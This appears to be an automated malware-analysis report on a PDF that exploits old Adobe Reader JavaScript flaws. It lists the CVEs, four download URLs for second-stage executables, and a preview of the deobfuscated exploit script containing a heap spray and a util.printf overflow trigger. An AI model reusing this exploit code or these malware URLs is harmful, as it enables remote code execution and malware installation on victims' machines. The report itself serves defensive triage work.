Verdict: MALICIOUS
Risk Score: 530
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript indicates that it downloads a second-stage payload from the URLs provided. The extracted URLs are the primary indicators of compromise.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics (12)

- Collab.getIcon — CVE-2009-0927 [critical, CVE exact, CVE_2009_0927]: PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE exact, CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 [critical, CVE exact, CVE_2008_2992]: PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher [critical, CVE likely, PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- ClamAV: Pdf.Exploit.Agent-36110 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Pdf.Exploit.Agent-36110
- Multi-CVE Adobe Reader JavaScript exploit kit [critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low, 2 related findings, PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript shellcode contains an embedded download URL [high, PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low, PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ASCIIHexDecode filter (with exploit indicators) [medium, PDF_FILTER_HEX]: Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://style-boards.com/forum/diksvw2.exe (referenced by PDF JavaScript)
  - http://style-boards.com/forum/click.php?r= (referenced by PDF JavaScript)
  - http://style-boards.com/forum/hijors2.exe (referenced by PDF JavaScript)
  - http://style-boards.com/forum/deip2.exe (referenced by PDF JavaScript)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0007_000.js (SHA-256 67f048ef058f4442b292be0f3a6ee9e0977c58971ab49c1c302a8e3d1c838a27) | pdf-javascript-stream | PDF /JS object 7 at offset 0x1A5 | 38785 bytes |

Preview of javascript_obj0007_000.js (first 1,000 lines of the extracted script): obfuscated loader built around a long numeric array; dump truncated.
| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js (SHA-256 1f084620d706a2f283068a44645e98f27c2b4e2a2179e9c368842d090d939589) | deobfuscated-js | numeric array subtract-key decoded JavaScript at offset 0x1A5 | 10024 bytes |

Detection (legacy_pdfkit_stage_000.js):
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely. Carved artifact contains 9 eval/decoder/string-building token(s) and 1 long base64-like blob(s).
Preview of legacy_pdfkit_stage_000.js (first 1,000 lines of the extracted script; the %uXXXX shellcode strings are truncated):

```javascript
// Repeats a string until it is at least len bytes, then cuts it to exactly
// len/2 UTF-16 characters (len bytes).
function fix_it(yarsp, len){
    while (yarsp.length * 2 < len){
        yarsp += yarsp;
    }
    yarsp = yarsp.substring(0, len/2);
    return yarsp;
}

// Branch for the util.printf sink (CVE-2008-2992).
function util_printf(){
    // Shellcode as little-endian %uXXXX escapes; its tail carries the
    // second-stage download URLs (see PDF_JS_SHELLCODE_DOWNLOAD_URL above).
    var payload = unescape("…");  // shellcode blob truncated
    var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
    var heapblock = nop + payload;
    // Heap spray: build ~0x40000-byte blocks of 0x0A0A padding plus shellcode
    // and allocate 1400 copies of them.
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var spray = headersize + heapblock.length;
    while (bigblock.length < spray){
        bigblock += bigblock;
    }
    var fillblock = bigblock.substring(0, spray);
    var block = bigblock.substring(0, bigblock.length-spray);
    while (block.length+spray < 0x40000){
        block = block + block + fillblock;
    }
    var mem_array = new Array();
    for (var i = 0; i < 1400; i++){
        mem_array[i] = block + heapblock;
    }
    // Trigger: oversized field width passed to util.printf.
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f", num);
}

// Branch for the Collab.collectEmailInfo sink (CVE-2007-5659).
function collab_email(){
    var shellcode = unescape("…");  // shellcode blob truncated
    // ... (truncated)
```